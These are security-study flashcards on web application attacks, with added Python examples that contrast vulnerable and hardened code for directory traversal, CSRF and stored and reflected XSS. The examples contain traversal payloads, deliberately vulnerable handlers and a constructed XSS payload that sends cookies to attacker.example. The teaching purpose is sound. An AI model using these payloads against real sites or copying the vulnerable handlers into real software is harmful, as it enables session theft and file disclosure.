Application Attacks Flashcards
XSS - cross site scripting attack
Type of application attack: attacker-supplied script is injected into content that a web application serves (through a form field, URL parameter or stored record) and executes in the victim's browser under the site's own origin, so it can read session cookies and page content. Two types: persistent (stored) or reflected.
Directory traversal
Application attack that uses specially crafted input containing "../" sequences (or encoded variants such as %2e%2e%2f) to traverse up the directory tree and access files or directories outside of the intended scope, e.g. ../../etc/passwd (OWASP -> Path Traversal).
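Worked example for the directory traversal card (added here; not part of the original flashcards). It puts a naive path join and a strip-"../" blocklist beside a hardened resolver that decodes, normalizes and then checks the result is still under the document root. The root /var/www/files, the file names and the payloads are constructed for the demo; nothing is read from disk, the functions only compute the path the server would open.

```python
"""Directory traversal: naive join and blocklist filter beside a hardened resolver."""
import posixpath
from urllib.parse import unquote

BASE = "/var/www/files"  # assumed document root for the example


def resolve_naive(base, user_path):
    """Vulnerable: trusts the client-supplied path and joins it to the root.
    '../../etc/passwd' becomes /var/www/files/../../etc/passwd, which the OS
    resolves to /var/etc/passwd."""
    return base + "/" + user_path


def resolve_blocklist(base, user_path):
    """Still vulnerable: a single-pass replace of '../' turns '....//' into
    '../' *after* the filter has run, so the classic payload survives."""
    return base + "/" + user_path.replace("../", "")


def resolve_safe(base, user_path, max_decodes=2):
    """Return the canonical path inside `base`, or None if the request escapes it."""
    base = posixpath.normpath(base)
    p = user_path
    # Decode percent-encoding until it stops changing, so a double-encoded
    # %252e%252e%252f (-> %2e%2e%2f -> ../) is seen for what it is.
    for _ in range(max_decodes):
        decoded = unquote(p)
        if decoded == p:
            break
        p = decoded
    if "\x00" in p:              # NUL-truncation tricks against C-backed file APIs
        return None
    p = p.replace("\\", "/")     # treat Windows separators like '/'
    if p.startswith("/"):        # an absolute path is never a valid relative request
        return None
    # normpath collapses '.', '//' and '..' segments; whatever is left must
    # still share the whole root with base, otherwise the path escaped it.
    full = posixpath.normpath(posixpath.join(base, p))
    if posixpath.commonpath([base, full]) != base:
        return None
    return full


if __name__ == "__main__":
    for req in ["reports/q1.pdf", "../../etc/passwd", "..%2f..%2fetc%2fpasswd",
                "%252e%252e%252fetc/passwd", "..\\..\\windows\\win.ini", "reports/q1.pdf%00.txt"]:
        print(f"{req!r:35} -> {resolve_safe(BASE, req)}")
    print("blocklist bypass:", resolve_blocklist(BASE, "....//....//etc/passwd"))
```

The safe version is an allowlist in disguise: instead of hunting for bad substrings it computes what the path *means* and accepts it only if the meaning is inside the root. In production the same check is done against the real filesystem with os.path.realpath so that symlinks inside the root cannot point outside it.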
Input validation
Enforcing and verifying the desired level of compliance at all stages. Input validation is the process of checking data received from the client or the environment (type, length, format, range, allowed characters) before the application uses it, preferably against an allowlist of what is expected rather than a blocklist of known-bad values.
SQLi attack
Type of injection attack: attacker-controlled input is concatenated into a SQL query sent to the backend database, so the input is parsed as SQL (attack code) instead of as data. Prevented by parameterized queries, which keep the query text fixed and pass values separately.
Output validation
Verifying the desired level of compliance at the output stage. It controls what is returned to the screen (or to any other consumer) by encoding untrusted data for the context it is written into, for example HTML-encoding user content before it is placed in a page, so that data cannot be interpreted as markup or code.
CSRF - cross site request forgery
Type of application attack: it tricks the victim's web browser into sending a forged, state-changing request to a trusted site where the user is currently authenticated. Because the browser automatically attaches the session cookie, the site accepts the request as the user's own; CSRF exploits the trust that a site has in the user's browser.
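Worked example for the CSRF card (added here; not part of the original flashcards). A funds-transfer handler that authenticates by session cookie alone is placed beside one that also demands a per-session anti-CSRF token and checks the Origin header. Requests are modelled as plain dicts (cookies, headers, form) rather than a real web framework; the origins bank.example and evil.example, the session and the balances are constructed for the demo.

```python
"""CSRF: cookie-only transfer endpoint beside a token + Origin checked one."""
import hmac
import secrets

SITE_ORIGIN = "https://bank.example"       # assumed origin of the trusted site
ATTACKER_ORIGIN = "https://evil.example"   # assumed origin of the attacker's page


def new_state():
    """Constructed server state: one logged-in user with a fresh CSRF token."""
    sid = secrets.token_urlsafe(16)
    return {
        "sessions": {sid: {"user": "alice", "csrf": secrets.token_urlsafe(32)}},
        "balances": {"alice": 1000, "bob": 0, "mallory": 0},
        "sid": sid,
    }


def _transfer(state, user, to, amount):
    state["balances"][user] -= amount
    state["balances"][to] = state["balances"].get(to, 0) + amount


def transfer_vulnerable(state, request):
    """Vulnerable: authenticates by cookie only. The browser attaches the cookie
    to any request aimed at the site, including a POST that an attacker's page
    auto-submits, so a forged request is indistinguishable from a real one."""
    sess = state["sessions"].get(request["cookies"].get("sid"))
    if sess is None:
        return 401
    _transfer(state, sess["user"], request["form"]["to"], int(request["form"]["amount"]))
    return 200


def transfer_hardened(state, request):
    """Hardened: the form must carry the token the server embedded in this
    session's page (the attacker's origin cannot read it, so it cannot forge
    it), and an Origin header, when present, must match the site."""
    sess = state["sessions"].get(request["cookies"].get("sid"))
    if sess is None:
        return 401
    token = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(token, sess["csrf"]):   # constant-time compare
        return 403
    origin = request["headers"].get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403
    _transfer(state, sess["user"], request["form"]["to"], int(request["form"]["amount"]))
    return 200


def legitimate_request(state):
    """The bank's own form: same origin, token embedded by the server."""
    sid = state["sid"]
    return {"cookies": {"sid": sid}, "headers": {"Origin": SITE_ORIGIN},
            "form": {"to": "bob", "amount": "50", "csrf_token": state["sessions"][sid]["csrf"]}}


def forged_request(state):
    """What the victim's browser sends after loading the attacker's page: the
    session cookie travels automatically, the token is unknown to the attacker."""
    return {"cookies": {"sid": state["sid"]}, "headers": {"Origin": ATTACKER_ORIGIN},
            "form": {"to": "mallory", "amount": "500"}}


def run(handler, build_request):
    """Fresh state, one request; returns (HTTP status, alice's balance afterwards)."""
    state = new_state()
    status = handler(state, build_request(state))
    return status, state["balances"]["alice"]


if __name__ == "__main__":
    print("vulnerable, forged:  ", run(transfer_vulnerable, forged_request))     # (200, 500)
    print("hardened,   forged:  ", run(transfer_hardened, forged_request))       # (403, 1000)
    print("hardened,   genuine: ", run(transfer_hardened, legitimate_request))   # (200, 950)
```

The token works because of the same-origin policy: evil.example can make the browser *send* a request to bank.example but cannot *read* bank.example's pages to learn the token. Marking the session cookie SameSite=Lax or Strict is a complementary defence, since the browser then omits it from cross-site POSTs in the first place.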
Persistent attack
Kind of XSS (cross-site scripting) attack. The attacker injects malicious code into an identified vulnerable web page or web API, where it is stored server-side (for example in a comment, profile field or database record). Every victim who later loads that page is served the script and executes it in their browser, so no crafted link is needed and one injection reaches many users. P-XSS is also called stored XSS.
Injection attack
Application attack that tricks an application into including unauthorized commands in the data it sends to an interpreter or processor (OS shell, LDAP, SQL). Because the interpreter cannot tell attacker-supplied text from the developer's own command, the injected text is executed.
Reflective attack
XSS (cross-site scripting) attack type: the malicious script travels in the request itself (a URL parameter or form field, typically delivered to the victim as a crafted link), the web application reflects it back in the response without encoding, and it executes in the victim's browser. Nothing is stored on the server; the attack initiates at the client side and ultimately executes only in that victim's browser.
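Worked example for the XSS, persistent and reflective cards, which also exercises the input validation and output validation cards (added here; not part of the original flashcards). A toy guestbook stores messages server-side and has a search box that echoes the query; a vulnerable renderer writes both straight into the page, a hardened one validates the display name against an allowlist and HTML-encodes everything on output. The guestbook, the payload pointing at attacker.example and the visitor names are constructed; rendering returns the HTML as a string instead of serving it.

```python
"""Stored and reflected XSS in a toy guestbook, vulnerable vs hardened."""
import html
import re

# Constructed payload: sends the victim's cookies to the attacker's host.
PAYLOAD = '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'

# Allowlist for a display name: letters, digits, space and a few punctuation marks.
NAME_RE = re.compile(r"[A-Za-z0-9 ._-]{1,40}")


def validate_name(name):
    """Input validation: accept only what a name is expected to look like."""
    return NAME_RE.fullmatch(name) is not None


class Guestbook:
    def __init__(self):
        self.entries = []      # stored server-side and shown to every later visitor

    def post(self, name, message):
        if not validate_name(name):
            raise ValueError("name rejected by input validation")
        if len(message) > 500:
            raise ValueError("message too long")
        # The message is free text, so validation cannot rid it of all markup
        # without mangling legitimate posts; it is stored as-is and must be
        # encoded when it is written into a page.
        self.entries.append((name, message))


def render_vulnerable(book, query):
    """Vulnerable: the reflected search term and the stored messages are
    written into the page verbatim, so '<script>' in either opens a tag."""
    lines = [f"<h1>Results for {query}</h1>"]
    for name, msg in book.entries:
        lines.append(f"<p><b>{name}</b>: {msg}</p>")
    return "\n".join(lines)


def render_hardened(book, query):
    """Hardened output encoding: every untrusted value is HTML-escaped for the
    element-body context it lands in ('<' -> '&lt;', '"' -> '&quot;', ...)."""
    lines = [f"<h1>Results for {html.escape(query)}</h1>"]
    for name, msg in book.entries:
        lines.append(f"<p><b>{html.escape(name)}</b>: {html.escape(msg)}</p>")
    return "\n".join(lines)


def script_runs(page):
    """Stand-in for a browser: True if the raw <script> tag survived into the HTML."""
    return "<script>" in page


def stored_page(hardened):
    """Persistent XSS: the attacker posts once; an unrelated visitor later
    searches for something harmless and still receives the stored script."""
    book = Guestbook()
    book.post("mallory", PAYLOAD)
    render = render_hardened if hardened else render_vulnerable
    return render(book, "hello")


def reflected_page(hardened):
    """Reflected XSS: nothing is stored; the victim followed a crafted link
    whose query parameter carries the payload, and the page echoes it."""
    book = Guestbook()
    render = render_hardened if hardened else render_vulnerable
    return render(book, PAYLOAD)


def post_accepted(name, message):
    """True if input validation lets a post through."""
    try:
        Guestbook().post(name, message)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print("stored,    vulnerable:", script_runs(stored_page(False)))      # True
    print("stored,    hardened:  ", script_runs(stored_page(True)))       # False
    print("reflected, vulnerable:", script_runs(reflected_page(False)))   # True
    print("reflected, hardened:  ", script_runs(reflected_page(True)))    # False
    print("name with markup accepted:", post_accepted("<img src=x onerror=alert(1)>", "hi"))  # False
```

Two points the cards make are visible here. Input validation stops the name-field payload outright but cannot protect the free-text message, which is why output encoding is the primary XSS defence. And encoding is context-specific: html.escape is right for text between tags or inside a quoted attribute, while a value placed into a URL, a JavaScript string or a CSS rule needs that context's own encoder.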